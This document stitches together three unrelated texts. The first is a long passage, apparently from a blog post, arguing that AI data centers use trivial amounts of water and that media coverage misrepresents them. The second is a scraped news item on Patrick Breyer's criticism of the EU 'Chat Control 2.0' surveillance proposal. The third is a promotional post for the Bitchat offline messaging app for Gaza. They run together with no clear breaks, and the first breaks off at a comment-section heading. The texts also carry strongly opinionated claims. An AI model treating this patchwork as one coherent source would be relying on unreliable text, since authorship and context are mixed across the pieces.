This makes sense when you think about it. Data centers are just big computers. Water just runs through them to cool them, in the same way your laptop needs to be cooled by a fan. Why would using water to cool a big computer significantly pollute the water? You want the water interfering with the physical material of the big computer as little as possible.

Data centers have an impact on local water systems, just like any other private industry. They shouldn’t just randomly be built anywhere. Local communities should consider the costs and benefits. But in doing this, they need to consider the actual amounts of water data centers will use compared to other normal industries, not compared to individual lifestyles.

Obviously, questions about electricity or pollution are real and should be considered separately, but at least in terms of water, I can’t find a single example where data center operations have harmed local water access in any way, many places where they’ve benefited local water access, and a universal pattern of huge tax revenues.

I think a lot of people don’t realize how much water we each use every day. Altogether, the average person’s daily water footprint is 422 gallons, or 1,600 liters. This is mostly from agriculture to grow our food, manufacturing products we use, and generating electricity. Only a small fraction is the water we use in our homes.

Our best current data on AI prompts’ water use comes from a thorough study by Google, which says that each prompt might only use ~2 mL of water if you include the water used in the data center as well as the offsite water used to generate the electricity.

This means that every single day, the average American uses enough water for 800,000 chatbot prompts. Each dot in this image represents one prompt’s worth of water. All the dots together represent how much water you use in one day in your everyday life (you’ll have to really zoom in to see them, each of those rectangles is 10,000 dots):

However, that 2 mL of water is mostly the water used in the normal power plants the data center draws from. The prompt itself only uses about 0.3 mL, so if you’re mainly worried about the water data centers use per prompt, you use about 300,000 times as much every day in your normal life. That’s the same water your local power plant uses to generate a watt-hour of energy, enough to use your laptop for about 2 minutes. So every hour that you use your laptop, you’re using up 30 chatbot prompts’ worth of water in a nearby power plant.
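The 800,000-prompts figure above is just unit conversion; a quick sketch of it in Python, using the per-prompt numbers cited from the Google study:

# Daily lifestyle footprint expressed in prompts' worth of water.
DAILY_FOOTPRINT_ML = 1600 * 1000   # ~422 gallons = ~1,600 L = ~1.6 million mL per person per day
PROMPT_TOTAL_ML = 2.0              # per prompt, onsite + offsite (Google estimate)
PROMPT_ONSITE_ML = 0.3             # per prompt, inside the data center only

print(DAILY_FOOTPRINT_ML / PROMPT_TOTAL_ML)   # ~800,000 prompts' worth of water per day
print(PROMPT_ONSITE_ML / DAILY_FOOTPRINT_ML)  # ~2e-7 of a day's footprint per prompt, onsite only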

Have you ever worried about how much water things you did online used before AI? Probably not, because data centers use barely any water compared to most other things we do. Even manufacturing most regular objects requires lots of water. Here’s a list of common objects you might own, and how many chatbot prompts’ worth of water they took to make (all from this list, using the onsite + offsite water value):

  • Leather Shoes - 4,000,000 prompts’ worth of water

  • Smartphone - 6,400,000 prompts

  • Jeans - 5,400,000 prompts

  • T-shirt - 1,300,000 prompts

  • A single piece of paper - 2550 prompts

  • A 400 page book - 1,000,000 prompts

If you want to send 2500 ChatGPT prompts and feel bad about it, you can simply not buy a single additional piece of paper. If you want to save a lifetime supply’s worth of chatbot prompts, just don’t buy a single additional pair of jeans.

Because generating electricity in America often involves water, anything you do that uses electricity often also uses water. The average water used per kWh of electricity in America is 4.35 L/kWh, according to the Lawrence Berkeley National Laboratory. This has a few weird assumptions (explained here), so to be conservative I’ll divide it in half to 2 L/kWh. This means that every kWh of electricity you use evaporates the same amount of water as 1,000 chatbot prompts (including both onsite and offsite water cost). Conveniently, that works out to one prompt’s worth of water per watt-hour.
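That conversion, spelled out (same assumptions as above: 2 L of water per kWh of electricity and ~2 mL per prompt, onsite plus offsite):

WATER_PER_KWH_ML = 2 * 1000    # 2 L/kWh of electricity -> 2,000 mL/kWh
WATER_PER_PROMPT_ML = 2.0      # per prompt, onsite + offsite

prompts_per_kwh = WATER_PER_KWH_ML / WATER_PER_PROMPT_ML
print(prompts_per_kwh)         # 1,000 prompts' worth of water per kWh
print(prompts_per_kwh / 1000)  # 1 prompt's worth per watt-hour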

Here are some common ways you might use electricity, and how many AI prompts’ worth of water the electricity used took to generate:

If you want to reduce your water footprint, avoiding AI will never make a dent. These numbers are so incredibly small it’s hard to find things to compare them to. If you send 10,000 chatbot prompts per year, the water used in AI data centers themselves adds up to 1/300,000th of your total water footprint. If your annual water footprint were a mile, 10,000 chatbot prompts would be 0.2 inches.

Even if AI is completely useless, and all the water you use on it is “wasted,” literally everything else you do in life involves larger amounts of wasted water, even if that activity is really valuable for you. If you boil water to make healthy food, you could make the exact same amount of food if you took a water dropper and extracted a few milliliters from the pot. A medium-sized pot can hold ~10 liters of water. That’s enough for 5000 chatbot prompts. If you took a dropper and removed 1/5000th of the water from the pot, you would still be able to use it to make whatever food you want, so that extra amount is “wasted” but it’s so small that it doesn’t matter at all. If you saw someone filling a pot like this:

and then using this dropper to remove tiny amounts of water at a time to “save” as much water as they could until the pot only contained exactly as much water as they needed so that they didn’t waste a drop,

you would correctly say that was a huge waste of time. In no other places do we think it’s reasonable to worry about “wasting” such a tiny amount of water in our personal lives. Even if you think all water used on AI is completely wasted, it still shouldn’t bother you any more than the fact that people don’t spend the time to remove tiny drops of water from the pots they boil to make food.

None of what I’m going to list here is generative AI like ChatGPT, but other machine learning tools have benefited heavily from spillover effects from the general economic success of generative AI tools. These tools include things like computer vision systems for manufacturing quality control, predictive maintenance algorithms for industrial equipment, recommendation engines for e-commerce, fraud detection systems for financial services, and optimization algorithms for logistics and supply chains. While these applications have existed for years, the massive investment flowing into AI infrastructure (data centers, chip manufacturing, training talent) has made them cheaper, faster, and more accessible to deploy at scale.

AI is a way to get a machine to build its own soup of internal heuristics for how to handle complex situations. This soup of heuristics both succeeds and fails in surprising ways. We don’t design the heuristics themselves, and don’t even know what they are or how they work, in the same way we don’t know how a lot of the heuristics in our own brains work. There are a lot of situations where deploying this type of machine can help us optimize water use, because there are lots of places in America and around the world where huge amounts of water are wasted. Almost 20% of U.S. drinking water is lost to leaking pipes before reaching consumers.

This was the result of a few minutes of Googling. I could go on way longer with more examples of ways simple AI tools are saving towns huge amounts of water.

Many people’s background aversion to using water on data centers is that it’s a physical resource being spent on a digital product. Shouldn’t we only spend physical goods on other physical goods?

We already use a lot of water on the internet, and digital goods in general. Most of the ways we generate electricity use a lot of water, so most of the time, when you’re using a computer, TV, or phone, you’re also using water. Internet data centers have always relied on water cooling, so we were always using water to access and share digital information.

Information is valuable. The real value of a book is almost entirely in the words it contains, not the physical quantity of ink and paper that make it up. We think it’s valuable to spend lots and lots of physical resources each year making books. Books and newspapers use 153 billion gallons of water annually. This is almost entirely in the service of delivering information. If it’s okay to spend water on creating and distributing books, it’s okay to spend water on other sources of valuable information. The water used to deliver digital information is orders of magnitude lower than physical books.

You might object that AI does not deliver anything like the value of books. My point isn’t to make a claim about how much valuable information AI provides, only that it isn’t inherently bad to spend a physical resource to deliver information. Ultimately, if you believe AI is entirely valueless, then any water used on it is wasted regardless of whether AI’s output is physical or digital. But the fact that it’s digital on its own shouldn’t factor into whether you think it’s valuable or not.

A very common point that comes up in conversations about AI and water use is that no matter how little water AI uses, AI is either useless or actively harmful, so all that water is being used on something bad. This makes it inherently worse than using any large amounts of water on good things. For example, when I share these stats from before:

Here’s a list of common objects you might own, and how many chatbot prompts’ worth of water they took to make (all from this list, using the onsite + offsite water value):

  • Leather Shoes - 4,000,000 prompts’ worth of water

  • Smartphone - 6,400,000 prompts

  • Jeans - 5,400,000 prompts

  • T-shirt - 1,300,000 prompts

  • A single piece of paper - 2550 prompts

  • A 400 page book - 1,000,000 prompts

I often get the response that all of these things have social value, whereas AI has no value, so AI is worse for water than all these things, even though it’s using tiny tiny tiny amounts of water compared to each.

It seems like some people measure how wasteful something is with water by a simple (value to society / water) ratio, where no matter how tiny something’s water use is, if it has negative value it’s always worse than something acceptable with huge water use.

This doesn’t make sense as a way of thinking about conserving water, for the same reason that it’s not a good way of thinking about saving money. If I were doing a fun activity that cost $40,000, and something useless or bad that cost $0.01, even though the $0.01 thing was bad, cutting it just would never ever be as promising or urgent as finding ways to reduce the cost of the $40,000 thing, or to just go without it.

Driving somewhere I want to be is much worse for the environment than riding a bike in the wrong direction. I agree that we need to factor in the value somehow, but it can’t just be “Anything socially bad is always worse for the environment than anything socially good.” AI water is often hundreds of thousands of times as small as many other ways we use water.

Talking about the social harm of a tool and adding “And it uses a few drops of water!” basically always dilutes the point you’re trying to make. I’m not exactly consistently pro-AI. There’s a lot I’m worried about. But I find it distasteful when people effectively say “This far-right authoritarian government is using powerful AI systems to surveil people!… and also, every time they use it, a few drops of water are evaporated!” This just so obviously dilutes and trivializes the much more important point that I’d really rather it not be brought up. Manufacturing a gun uses at minimum 10,000 times as much water as an AI prompt in a data center, but if authoritarians are bearing down on people, I’m not going to add “And it cost a glass of water each to make their guns!”

Data centers don’t have to use water for cooling, they can also circulate cold air. They do this much more often when they’re built in deserts, because water’s more expensive and solar power’s cheaper and more abundant. As with any industry, they respond to the costs of goods and adjust how they use them accordingly.

But replacing water with air cooling systems means a lot more energy is used on cooling. Circulating cool air is more energy intensive than circulating water. Because water has much higher heat capacity and thermal conductivity than air, it can absorb and transfer heat more efficiently. Air cooling (especially in hot climates) requires stronger fans, chillers, compressors, and mechanical systems to push cooled air throughout the facility.

One study found that replacing air cooling with liquid cooling reduces a data center’s total power usage by 10% . This is a big deal, because electricity demand is a much more serious problem for data centers. Using 10% less energy also means roughly 10% less CO2 emissions. If water usage isn’t an issue, it seems like the main effect of water cooling is preventing a significant amount of CO2 emissions and electricity demand.

This is the single most influential article ever written about ChatGPT and the environment. I still to this day regularly bump into people who think that ChatGPT uses a whole bottle of water every time you prompt it.

Friend of the blog SE Gyges has written the best thorough explanation of why this article looks likely to be an intentional lie. I’d recommend the entire thing . The article concludes that the only way this number could possibly be real is if you make every one of the following assumptions:

For a worst-case estimate using the paper’s assumptions, if

  • you query ChatGPT 10 times per email,

  • you include water used to generate electricity,

  • the datacenter hosting it is in the state of Washington,

  • the datacenter uses the public power grid or something close to it,

  • water evaporated from hydroelectric power reservoirs could otherwise have been used productively for something other than power generation,

  • and LLMs were not more efficient when they were being sold for profit in 2024 than they were in 2020 when they had never been used by the public

then it is true that an LLM uses up 500 or more milliliters of water per email.

You can reach a similar estimate by different methods, since they break out the water use per state differently. For example, if the datacenter hosting ChatGPT is not in Washington, it will have a higher carbon footprint but a lower water footprint and you will have to query it 30 or 50 times to use up an entire bottle of water. This is not what anyone imagines when they hear “write a 100-word email”.

That study’s authors are well aware that none of these assumptions are realistic. Information about how efficient LLMs are when they are served to users is publicly available. People do not generally query an LLM fifty times to write a one hundred word email.

It is completely normal to publish, in an academic context, a worst-case estimate based on limited information or to pick assumptions which make it easy to form an estimate. In this setting your audience has all the detail necessary to determine if your worst-case guess seems accurate, and how to use it well.

Publishing a pessimistic estimate that makes this many incorrect assumptions in a newspaper of record with no further detail is just lying to readers.

Take this one from the Economic Times; it circulated a lot:

The article clarifies that this is 463 million gallons of water spread over 2 years, or 640,000 gallons of water per day. Texas consumes 13 billion gallons of water per day. So all data centers added 0.005% to Texas’s water demands.

0.005% of Texas’s population is 1,600. Imagine a headline that said “1,600 people moved to Texas. Now, residents are being asked to take shorter showers.”

Many iterations of the same article appeared:

One article corrected for the much larger uptick of data centers in 2025:

50 billion gallons per year is a lot more! That’s more like 1.1% of Texas’s water use. Nowhere in this article does it share that proportion. It seems pretty normal for a state as large as Texas to have a 1% fluctuation in its water demand.

From the New York Times:

The subtitle says: “In the race to develop artificial intelligence, tech giants are building data centers that guzzle up water. That has led to problems for people who live nearby.”

Reading it, you would have to assume that the main data center in the story is guzzling up the local water in the way other data centers use water.

In the article, residents describe how their wells dried up because residue from the construction of the data center added sediment to the local water system. The data center had not been turned on yet. Water was not being used to cool the chips. This was a construction problem that could have happened with any large building. It had nothing to do with the data center draining the water to cool its chips. The data center was not even built to draw groundwater at all; it relies on the local municipal water system.

The residents were clearly wronged by Meta here and deserve compensation. But this is not an example of a data center’s water demand harming a local population. While the article itself is relatively clear on this, the subtitle says otherwise!

The rest of the article is also full of statistics that seem somewhat misleading when you look at them closely.

Water troubles similar to Newton County’s are also playing out in other data center hot spots, including Texas, Arizona, Louisiana and the United Arab Emirates. Around Phoenix, some homebuilders have paused construction because of droughts exacerbated by data centers.

The term “exacerbated” is doing a lot of work here. If there is a drought happening, and a data center is using literally any water, then in some very technical sense that data center is “exacerbating” the drought. But in no single one of these cases did data centers seem to actually raise the local cost of water at all. We already saw in Phoenix that data centers were only using 0.12% of the county water. It would be odd if that was what caused home builders to pause.

The article goes on with some ominous predictions about Georgia’s water use around the data center, but so far residents have not seen their water bills rise at all. We’re good at water economics! You wouldn’t know that at all from reading this article.

I think a story whose substance is a construction issue, under a title that ties it to something specific to data centers, is a lot like a news story reporting on loud sounds from the construction of a building that happens to be a bank, headlined “Many banks are known for their incredible noise pollution. Some residents found out the hard way.” This would leave you with an incorrect understanding of banks.

Contra the subtitle, data centers “guzzling up water” in the sense of “using the water for cooling” has not led to any problems, anywhere, for the people who live nearby. The subtitle is a lie.

This same story was later referenced by a long article on AI water use at CNET, here with a wildly misleading framing:

The developer, 1778 Rich Pike, is hoping to build a 34-building data center campus on 1,000 acres that spans Clifton and Covington townships, according to Ejk and local reports. That 1,000 acres includes two watersheds, the Lehigh River and the Roaring Brook, Ejk says, adding that the developer’s attorney has said each building would have its own well to supply the water needed. “Everybody in Clifton is on a well, so the concern was the drain of their water aquifers, because if there’s that kind of demand for 34 more wells, you’re going to drain everybody’s wells,” Ejk says. “And then what do they do?”

Ejk, a retired school principal and former Clifton Township supervisor, says her top concerns regarding the data center campus include environmental factors, impacts on water quality or water depletion in the area, and negative effects on the residents who live there.

Her fears are in line with what others who live near data centers have reported experiencing. According to a New York Times article in July, after construction kicked off on a Meta data center in Social Circle, Georgia, neighbors said wells began to dry up, disrupting their water source.

There’s no mention anywhere in the article that the data center in Georgia was not using the well water for normal operations.

Here’s a popular Bloomberg story from May . It shows this graphic:

Red dots indicate data centers built in areas with higher or extremely high water stress. My first thought as someone who lives in Washington DC was “Sorry, what?”

Northern Virginia is a high water stress area?

I cannot find any information online about Northern Virginia being a high water stress area. It seems to be considered low to medium. Correct me if I’m wrong. Best I could do was this quote from the Financial Times:

Virginia has suffered several record breaking dry-spells in recent years, as well as a “high impact” drought in 2023, according to the U.S. National Integrated Drought Information System. Much of the state, including the northern area where the four counties are located, is suffering from abnormally dry conditions, according to the U.S. Drought Monitor. But following recent rain, the Virginia Department of Environmental Quality on Friday lifted drought advisories across much of the state, though drought warnings and watches are still in effect for some regions.

Back to the map. There were some numbers shared in a related article by one of the same authors . But readers were left without a sense of proportion of what percentage of our water all these data centers are using.

AI’s total consumptive water use is equal to the water consumption of the lifestyles of everyone in Paterson, New Jersey. This graphic is effectively spreading the water costs of the population of Paterson across the whole country, and drawing a lot of scary red dots. The dots are each where a relatively tiny, tiny amount of water is being used, and they’re only red where the regions are struggling with water. This could be done with anything that uses water at all and doesn’t give you any useful information about how much of a problem they are for the region’s water access.

Even the title chart can send the wrong message.

I think for a lot of people, stories about AI are their first time hearing about data centers. But the vast majority of data centers exist to support the internet in general, not AI.

Simply showing the number of data centers doesn’t show the impact of AI specifically, or how much power data centers are drawing. Power roughly correlates with water, because the more energy is used in data center computers, the more they need to be cooled, and the more water is needed to do that. Here’s a graph showing the power demand of all data centers, and how much of that demand AI makes up.

Obviously there’s been a big uptick in power draw since 2019, but AI is still a small fraction of total data center power draw. I think Goldman Sachs underestimated AI’s power draw here; experts think it’s more like ~15% of total power used in data centers. But it’s important to understand that the vast majority of that original scary red data center graph isn’t AI specifically.

AI is going to be a large part of the very large data center buildout that’s currently underway, but it’s important to understand that up until this point most of those data centers on the graph were just the buildout of the internet.

One more note, circling back again to Maricopa County.

The county is a gigantic city built in the middle of a desert. For as long as it’s existed, it’s been under high water stress. Everyone living there is aware of this. The entire region is (I say this approvingly) a monument to man’s arrogance.

The only reason anyone can live in Phoenix in the first place is that we have done lots of ridiculous massive projects to move huge amounts of water to the area from elsewhere.

This is an area where environmentalism and equity come apart. I’d like residents of Phoenix to have access to reliable water supplies, but I don’t think this is the most environmentalist move. I think the most environmentalist move would probably be to encourage people to leave the Phoenix area in the first place and live somewhere that doesn’t need to spend over twice as much energy as the national average on pumping water. I have to bite the bullet here and say that between environmentalism and equity, I’d rather choose equity and not raise people’s water prices much, even though they’ve chosen to live in the middle of a desert.

It seems inconsistent to think that it’s wrong for environmentalist reasons to build data centers near Phoenix that increase the city’s water use by 0.1%, but it’s not wrong for Phoenix to exist in the first place. If it’s bad for the environment to build data centers in the area at all, Phoenix’s low water bills themselves seem definitionally bad for the environment too. I think you can be on team “Keep Phoenix’s water bills low, and build data centers there” or team “Neither the data centers nor Phoenix should be built there, we need to raise residents’ water bills to reflect this fact” but those are the only options. I’m on team build the data centers and help out the residents of Phoenix.

More Perfect Union is one of the single largest sources of misleading ideas about data center water usage anywhere. They very regularly put out wildly misleading videos and headlines. There are so many that I’ve written a long separate post on them here. They are maybe the single most deceptive media organization in the conversation relative to their reach.

Many articles choose to report AI’s water use this way:

“AI is now using as much as (large number) of homes.”

Take this quote from Newsweek :

In 2025, data centers across the state are projected to use 49 billion gallons of water, enough to supply millions of households , primarily for cooling massive banks of servers that power generative AI and cloud computing.

That sounds bad! The water to supply millions of homes sounds like a significant chunk of the total water used in America.

The vast majority (~93%) of our individual total consumption of freshwater resources does not happen in our homes; it happens in the production of the food we eat. Experts seem to disagree on exactly what percentage of our freshwater consumption happens in our homes, but it’s pretty small. Most estimates seem to land around 1%. So if you just look at the tiny, tiny part of our water footprint that we use in our homes, data centers use a lot of those tiny amounts. But if you look at the average American’s total consumptive water footprint of ~1,600 L/day, 49 billion gallons per year is about 300,000 people’s worth of water. That’s about 1% of the population of Texas. The entire data center industry (both for AI and the internet) using as much water as 1% of its population just doesn’t seem as shocking.

A move that I complained about in my last post is that a lot of articles will imply that AI companies are hiding the “true, real” water costs of data centers by only reporting the “onsite” water use (the water used by the data center) and not the “offsite” water use (the water used in nearby power plants to generate the electricity). Reporting both onsite and offsite water costs has become standard in reporting AI’s total water impact.

Many authors leave their readers hanging about what these “true costs” are. They’ll report a minuscule amount of water used in a data center, and it’s obvious to the reader that it’s too small to care about, but then the author will add “but the true cost is much higher” and leave the reader hanging, to infer that the true cost might matter.

We actually have a pretty simple way of estimating what the additional water cost of offsite generation is. Data centers on average use 0.48 L of water to cool their systems for every kWh of energy they use, and the power plants that provide data centers energy average 4.52 L/kWh. So to get a rough estimate:

  • If you know the onsite water used in the data center, multiply it by 10.4 to get the onsite + offsite water.

  • If you know the onsite energy used, multiply it by 5.00 L/kWh to get the onsite + offsite water used.

Obviously scaling up a number by a factor of 10 is a lot, but it often still isn’t very much in absolute terms. Going from 5 drops of water for a prompt to 50 drops is a lot relatively, but in absolute terms it’s a change from 0.00004% of your daily water footprint to 0.0004%. Journalists should make these magnitudes clear instead of leaving their readers hanging.
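Those two rules of thumb come straight from the averages above; in code:

# Onsite -> onsite + offsite conversion, using the averages cited above.
ONSITE_L_PER_KWH = 0.48    # cooling water used in the data center itself
OFFSITE_L_PER_KWH = 4.52   # water used by the power plants supplying it

total_l_per_kwh = ONSITE_L_PER_KWH + OFFSITE_L_PER_KWH   # 5.00 L/kWh
multiplier = total_l_per_kwh / ONSITE_L_PER_KWH          # ~10.4

print(total_l_per_kwh, multiplier)

# e.g. a facility reporting 1 million liters/day of onsite cooling water implies
# roughly 10.4 million liters/day once offsite generation water is included.
print(1_000_000 * multiplier)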

Let’s say there are 2 data centers in a town (I’ll call them Poseidon and Enki ) drawing from the same power source. The local town’s electricity costs 4 L of water per kWh to generate.

The Poseidon data center is pretty wasteful with its cooling water. It spends 2 L of water on cooling for every kWh it uses on computing, way above the national average of 0.48 L/kWh. So if you add the onsite and offsite water usage, Poseidon uses 6 L of water per kWh.

The Enki data center finds a trick to be way more efficient with its cooling water. It drops its water use down to 0.1L/kWh. Well below the national average. So if you add its onsite and offsite water usage, it uses 4.1 L per kWh without using any more energy.

Obviously, the Enki data center is much better for the local water supply.

Both data centers are asked by the town to release a report on how much water they’re using. They both choose to only report on the water they’re actually using in the data center itself.

Suddenly, a local newspaper shares an expose: both data centers are secretly using more water than they reported, but Enki’s secret, real water use is 41x its reported water costs.

Poseidon’s, meanwhile, is only 3x its reported water costs.

Here, Enki looks much more dishonest than Poseidon. If readers only saw these proportions, they would probably be left thinking that Enki is much worse for the local water supply. But this is wrong! Enki’s much better. The reason the proportions are so different is that Enki has managed to make its use of water so efficient compared to the nearby power plant.
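Running the thought experiment’s numbers makes the distortion obvious (Poseidon and Enki are the hypothetical data centers defined above, sharing a grid that costs 4 L of water per kWh):

OFFSITE = 4.0   # L/kWh of water used by the shared power source

for name, onsite in [("Poseidon", 2.0), ("Enki", 0.1)]:
    total = onsite + OFFSITE
    print(name, "total:", total, "L/kWh | true/reported ratio:", round(total / onsite, 1))

# Poseidon total: 6.0 L/kWh | ratio 3.0x
# Enki     total: 4.1 L/kWh | ratio 41.0x  <- looks "more dishonest" but uses far less water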

I think something like this often happens with data center water reporting.

When I wrote about a case of Google’s “secret, real water cost” actually not being very much water, a lot of people messaged me to say Google still looks really dishonest here, because the secret cost is 10x its stated water costs once you add the offsite costs. A way of reframing this is to say that Google’s made its AI models so energy efficient that they’re now only using 1/10th as much water in their data centers per kWh as the water required to generate that energy. This seems good! We should frame this as Google solidly optimizing its water use.

Take this quote from a recent article titled “Tech companies rarely reveal exactly how much water their data centers use, research shows”:

Sustainability reports offer a valuable glimpse into data center water use. But because the reports are voluntary, different companies report different statistics in ways that make them hard to combine or compare. Importantly, these disclosures do not consistently include the indirect water consumption from their electricity use, which the Lawrence Berkeley Lab estimated was 12 times greater than the direct use for cooling in 2023. Our estimates highlighting specific water consumption reports are all related to cooling.

The article should have mentioned that this means data centers have made their water use so efficient that basically the only water they’re using at all is in the nearby power plant, not in the data centers themselves. But framing it in the original way makes it look like the AI labs are hiding a massive secret cost from local communities, which I guess is a more exciting story.

If you use literally any water in any area with a drought, you’re in some sense “straining the local water system” and “exacerbating the drought.” Both of these tell us basically nothing meaningful about how bad a data center is for a local water system. If an article doesn’t come with any clarification at all about what the actual expected harms are, I would be extremely wary of this language. In basically every example I can find where it’s used, the data centers are adding minuscule amounts of water demand to the point that they’re probably not changing the behavior of any individuals or businesses in the area.

This is the great singular sin of bad climate communication. The second you see it, you should assume it’s misleading. Simply reporting “millions of gallons of water” without context gives you no information. Generating the power our digital clocks draw uses millions of gallons of water, but digital clocks aren’t causing a water crisis.

Take this example:

7.2 million gallons per year! Sounds like a ton. How much is that? This data center would represent about 0.02% of nearby El Paso’s water usage . Probably not nearly as much as this tweet is trying to get across.

Whenever you see an article cite a huge amount of water with no comparison at all to give you a proper sense of proportion, ask a chatbot to contextualize the number for you.

Take this excerpt from “ Are data centers depleting the Southwest’s water and energy resources? ”:

Meta’s data centers, meanwhile, withdrew 1.3 billion gallons of water in 2021 , 367 million of which were from areas with high or extremely high water stress. Total global water consumption from Meta’s data centers was over 635 million gallons, equivalent to about 6,697 U.S. households. It’s not clear how much of this water withdrawal occurs in the United States, although that’s where most of Meta’s data centers are located. Neither report reveals the specific water use of the company’s Arizona data center.

I’m going to rewrite this, but using my town of 16,000 people (Webster, Massachusetts) as a unit to measure Meta’s data center withdrawal instead of individual households. Webster’s utility delivers 1.4 million gallons of water per day to the citizens and businesses there (511 million gallons per year).

Meta’s data centers, meanwhile, withdrew as much water as 3 Massachusetts small towns in 2021. Two thirds of a single one of those small towns was in areas with high or extremely high water stress. Total global water consumption from Meta’s data centers was a little more than a single Massachusetts small town. It’s not clear how much of this water withdrawal occurs in the United States, although that’s where most of Meta’s data centers are located. Neither report reveals the specific water use of the company’s Arizona data center.

This all seems silly when you consider that Meta is one of the largest internet companies in the world.

Many articles about current or future AI data centers report how much water their permits allow, not how much water they actually use

When a data center is being built, the company needs to obtain water use permits from local authorities before construction. At this stage, they have to estimate their maximum possible water consumption under worst-case scenarios:

  • All cooling systems running at full capacity

  • Peak summer temperatures

  • Maximum IT load (every server rack filled and running)

  • Minimal efficiency from cooling systems

The permit needs to cover this theoretical maximum because regulators want to ensure the local water infrastructure can handle the demand and that there’s enough water supply for everyone. It’s easier to get a higher permit upfront than to come back later and request more, so data centers are incentivized to aim high.

Actual water usage is always significantly lower than what the permits allow, because they’re designed with the absolute worst conditions in mind. But many popular articles about how much water data centers use give the number on the water permit, not how much the data center actually uses.
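
As a purely illustrative sketch of that gap (every number below is invented for the example, not taken from any real permit or facility), a worst-case permit figure and an ordinary operating day can differ several-fold:

# permit_vs_actual.py — illustrative only; all inputs are made-up assumptions
HOURS_PER_DAY = 24
LITERS_PER_GALLON = 3.785

def daily_water_gal(it_load_mw: float, water_l_per_kwh: float, utilization: float) -> float:
    """Daily cooling water in US gallons for a given IT load and water intensity."""
    kwh = it_load_mw * 1_000 * HOURS_PER_DAY * utilization
    return kwh * water_l_per_kwh / LITERS_PER_GALLON

# Hypothetical 100 MW facility: the permit is sized for full load, peak heat,
# and the least-efficient cooling; a typical day runs cooler and below capacity.
permit_max = daily_water_gal(100, water_l_per_kwh=1.8, utilization=1.0)
typical    = daily_water_gal(100, water_l_per_kwh=0.5, utilization=0.6)

print(f"permitted max: ~{permit_max:,.0f} gal/day")  # ~1.14 million gal/day
print(f"typical day:   ~{typical:,.0f} gal/day")     # ~190,000 gal/day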

Here’s one of many examples :

Duff is the only city council member to vote no on a recently approved $800 million data center - rumored to be for Facebook - after discovering the facility would eventually use 1.75 million gallons of water every day for cooling their rows of servers once fully operational.

Discussion about this post

Not even a month passed and Chat Control is back in the EU

Hacker News
reclaimthenet.org
2025-11-14 17:54:07
Comments...
Original Article

A major political confrontation over online privacy is approaching as European governments prepare to decide on “ Chat Control 2.0, ” the European Commission’s revised proposal for monitoring private digital communications.

The plan, which could be endorsed behind closed doors, has drawn urgent warnings from Dr. Patrick Breyer, a jurist and former Member of the European Parliament, who says the draft conceals sweeping new surveillance powers beneath misleading language about “risk mitigation” and “child protection.”

In a release sent to Reclaim The Net, Breyer, long a defender of digital freedom, argues that the Commission has quietly reintroduced compulsory scanning of private messages after it was previously rejected.

He describes the move as a “deceptive sleight of hand,” insisting that it transforms a supposedly voluntary framework into a system that could compel all chat, email, and messaging providers to monitor users.

“This is a political deception of the highest order,” Breyer said.

“Following loud public protests, several member states, including Germany, the Netherlands, Poland, and Austria, said ‘No’ to indiscriminate Chat Control. Now it’s coming back through the back door disguised, more dangerous, and more comprehensive than ever. The public is being played for fools.”

Under the new text , providers would be obliged to take “all appropriate risk mitigation measures” to prevent abuse on their platforms. While the Commission presents this as a flexible safety requirement, Breyer insists it is a loophole that could justify forcing companies to scan every private message, including those protected by end-to-end encryption.

“The loophole renders the much-praised removal of detection orders worthless and negates their supposed voluntary nature,” he said.

He warns that it could even lead to the introduction of “client-side scanning,” where users’ devices themselves perform surveillance before messages are sent.

Unlike the current temporary exemption known as “Chat Control 1.0,” which allows voluntary scanning of photos and videos, the new draft would open the door to text and metadata analysis. Algorithms and artificial intelligence could be deployed to monitor conversations and flag “suspicious” content.

Breyer notes that such automated scrutiny cannot interpret context and risks sweeping up ordinary exchanges. “No AI can reliably distinguish between a flirt, sarcasm, and criminal ‘grooming’,” he said. “Imagine your phone scanning every conversation with your partner, your daughter, your therapist, and leaking it just because the word ‘love’ or ‘meet’ appears somewhere. This is not child protection, this is a digital witch hunt.”

According to Breyer, the existing voluntary system has already proven flawed, with German police reporting that roughly half of all flagged cases turn out to be irrelevant.

The proposal also carries major implications for identity and anonymity online. A new requirement would force users to verify their age before creating accounts on messaging or email platforms, an obligation that would likely require official ID or biometric checks.

Breyer argues that such measures effectively abolish anonymous communication. “This is the de facto end of anonymous communication online, a disaster for whistleblowers, journalists, political activists, and people seeking help who rely on the protection of anonymity,” he said.

He also condemned the provision restricting minors under 16 from using messaging and social media platforms with chat functions. “Digital isolation instead of education, protection by exclusion instead of empowerment, this is paternalistic, out of touch with reality, and pedagogical nonsense,” he warned, saying the measure risks cutting young people off from key channels of social and educational interaction.

Breyer is calling on EU governments that previously resisted mass surveillance, among them Germany, the Netherlands, Poland, Czechia, Luxembourg, Finland, Austria, and Estonia, to block the regulation in its current form.

“Now, these governments must show some backbone!” he urged. “Block this sham compromise in the Council and demand immediate corrections to save the fundamental rights of all citizens.”

He proposes a series of specific changes before any agreement should move forward: a guarantee that “risk mitigation” cannot be used to mandate scanning, a prohibition on AI-driven monitoring of text conversations, strict judicial oversight for targeted investigations, and the preservation of anonymous access to communication tools.

“They are selling us security but delivering a total surveillance machine,” Breyer concluded.

“They promise child protection but punish our children and criminalize privacy. This is not a compromise; this is a fraud against the citizen. And no democratic government should make itself an accomplice.”

Bitchat for Gaza – messaging without internet

Hacker News
updates.techforpalestine.org
2025-11-14 17:43:40
Comments...
Original Article

Bitchat is a new messaging app that allows users to chat securely with or without internet access. Download it today via the App Store or Google Play store to begin communicating safely, even when connectivity disappears.

Why Bitchat is needed

Palestinians are dependent on Israel for their access to electricity, telecoms, and internet routing. Israel has weaponized this dependence in Gaza by deliberately causing blackouts that have left Palestinians cut off from communicating with each other or with the outside world. The relentless bombing campaign has also destroyed or severely crippled any remaining communication infrastructure.

Even when Palestinians use regular communication methods, their conversations and messages can be monitored and recorded , leaving them exposed to surveillance and potential targeting.

The basic human right to communicate freely, and without interruption, has been denied to the Palestinian people.

The solution

Bitchat lets you keep messaging even when the internet or power is down. It connects phones directly through Bluetooth, and each phone helps pass messages along, allowing communication to stretch much farther than just your immediate area. Everything is fully encrypted so your conversations stay private.

When you do have internet or cell service, Bitchat can send your messages anywhere in the world using a network of relays. There is no central server that stores any of your data. You don’t need to create an account, share your phone number or email, or even have a SIM card to use it.

Staying connected when all else fails

Bitchat is an Israel-proof messaging alternative that continues to work even when traditional networks are shut down. The app also has “Geohash” channels that allow users to join location-based chats, so Palestinians can stay connected to their neighbors down the street or to the larger community in cities across the region.

This lets Palestinians check on the safety of loved ones, organize and coordinate within their communities, and share critical news and updates.

Validated by T4P

